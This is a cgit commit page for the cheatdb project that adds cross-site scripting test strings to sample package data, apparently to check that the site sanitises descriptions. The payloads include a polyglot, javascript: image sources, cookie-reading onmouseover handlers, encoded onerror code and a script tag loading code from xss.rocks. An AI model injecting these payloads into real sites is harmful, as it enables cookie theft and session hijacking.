aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorrubenwardy <rw@rubenwardy.com>2020-01-22 23:45:40 +0000
committerrubenwardy <rw@rubenwardy.com>2020-01-22 23:45:40 +0000
commit5e60cb83de861a46ed18a27a62b6720f3dd341f0 (patch)
tree616584b1b12571cadcee838d15a67c27e017c769
parent595d6ea3b6d663080448085cc2b0c9473388bc37 (diff)
downloadcheatdb-5e60cb83de861a46ed18a27a62b6720f3dd341f0.tar.xz
Add XSS strings to test datav1.22.1
Diffstat
-rw-r--r--app/default_data.py32
1 files changed, 32 insertions, 0 deletions
diff --git a/app/default_data.py b/app/default_data.py
index 85f42b3..eb8aec6 100644
--- a/app/default_data.py
+++ b/app/default_data.py
@@ -304,6 +304,38 @@ No warranty is provided, express or implied, for any part of the project.
game1.desc = """
As seen on the Capture the Flag server (minetest.rubenwardy.com:30000)
+` `[`javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/`](javascript:/*--%3E%3C/title%3E%3C/style%3E%3C/textarea%3E%3C/script%3E%3C/xmp%3E%3Csvg/onload='+/%22/+/onmouseover=1/+/)`[*/[]/+alert(1)//'>`
+
+<IMG SRC="javascript:alert('XSS');">
+
+<IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)>
+
+``<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>``
+
+\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>
+
+\<a onmouseover=alert(document.cookie)\>xxs link\</a\>
+
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+
+<script>alert("hello");</script>
+
+<SCRIPT SRC=`[`http://xss.rocks/xss.js></SCRIPT>`](http://xss.rocks/xss.js%3E%3C/SCRIPT%3E)`;`
+
+`<IMG \"\"\">`
+
+<SCRIPT>
+
+alert("XSS")
+
+</SCRIPT>
+
+<IMG SRC= onmouseover="alert('xxs')">
+
+<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
+
+"\>
+
Uses the CTF PvP Engine.
"""
generated by cgit v1.2.3 (git 2.39.1) at 2025-07-31 15:28:14 +0000